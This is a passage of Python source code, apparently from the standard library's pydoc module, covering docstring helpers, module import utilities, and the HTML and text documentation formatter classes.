return result and re.sub('^ *\n', '', result.rstrip()) or ''
def splitdoc(doc):
"""Split a doc string into a synopsis line (if any) and the rest."""
lines = doc.strip().split('\n')
if len(lines) == 1:
return lines[0], ''
elif len(lines) >= 2 and not lines[1].rstrip():
return lines[0], '\n'.join(lines[2:])
return '', '\n'.join(lines)
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = pairs[1].join(text.split(pairs[0]))
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__',
'__cached__', '__author__', '__credits__', '__date__',
'__version__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return True
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
results = []
for (name, kind, cls, value) in inspect.classify_class_attrs(object):
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
results.append((name, kind, cls, value))
return results
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not line.strip():
line = file.readline()
if not line: break
line = line.strip()
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not line.strip():
line = file.readline()
if not line: break
result = line.split('"""')[0].strip()
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = tokenize.open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
self.filename = filename
self.exc, self.value, self.tb = exc_info
def __str__(self):
exc = self.exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
with open(path, 'rb') as file:
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.seek(0)
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Remove the module from sys.modules and re-import to try
# and avoid problems with partially loaded modules.
# Also remove any submodules because they won't appear
# in the newly loaded module's namespace if they're already
# in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in path.split('.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
PYTHONDOCS = os.environ.get("PYTHONDOCS",
"http://docs.python.org/%d.%d/library"
% sys.version_info[:2])
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError(message)
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS", self.PYTHONDOCS)
basedir = os.path.join(sys.exec_prefix, "lib",
"python%d.%d" % sys.version_info[:2])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'_thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'dist-packages')) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(text.expandtabs())
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, modpkginfo):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = modpkginfo
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def filelink(self, url, path):
"""Make a link to source file."""
return '<a href="file:%s">%s</a>' % (url, path)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return ''.join(results)
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + ', '.join(parents) + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = name.split('.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
('.'.join(parts[:i+1]), parts[i]))
linkedname = '.'.join(links + parts[-1:])
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = self.filelink(url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % ', '.join(info)
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Reference</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda t: self.modulelink(t[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = [value for (key, value) in classes]
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', ' '.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', ' '.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', '<br>\n'.join(contents))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if callable(value) or inspect.isdatadescriptor(value):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = [(name, kind, cls, value)
for name, kind, cls, value in classify_class_attrs(object)
if visiblename(name, obj=object)]
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is builtins.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
attrs.sort(key=lambda t: t[0])
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % ', '.join(parents)
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.__self__.__class__
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.__self__ is not None:
note = ' method of %s instance' % self.classlink(
object.__self__.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.__func__
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, kwonlyargs, kwdefaults, varkw, defaults, ann = \
inspect.getfullargspec(object)
argspec = inspect.formatargspec(
args, varargs, kwonlyargs, kwdefaults, varkw, defaults, ann,
formatvalue=self.formatvalue,
formatannotation=inspect.formatannotationrelativeto(object))
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
# XXX lambda's won't usually have func_annotations['return']
# since the syntax doesn't support but it is possible.
# So removing parentheses isn't truly safe.
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + '_'.join(type(x).__name__.split())
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return ''.join(ch + '\b' + ch for ch in text)
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = [prefix + line for line in text.split('\n')]
if lines: lines[-1] = lines[-1].rstrip()
return '\n'.join(lines)
def section(self, title, contents):
"""Format a section with a given heading."""
clean_contents = self.indent(contents).rstrip()
return self.bold(title) + '\n' + clean_contents + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = (classname(c, modname) for c in bases)
result = result + '(%s)' % ', '.join(parents)
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
all = getattr(object, '__all__', None)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE REFERENCE', docloc + """
The following documentation is automatically generated from the Python
source files. It may be incomplete, incorrect or include features that
are considered implementation detail and may vary between Python
implementations. When in doubt, consult the module reference at the
location listed above.
""")
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', '\n'.join(modpkgs))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', '\n'.join(submodules))
if classes:
classlist = [value for key, value in classes]
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', '\n'.join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', '\n'.join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', '\n'.join(contents))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = version[11:-1].strip()
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % ', '.join(parents)
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
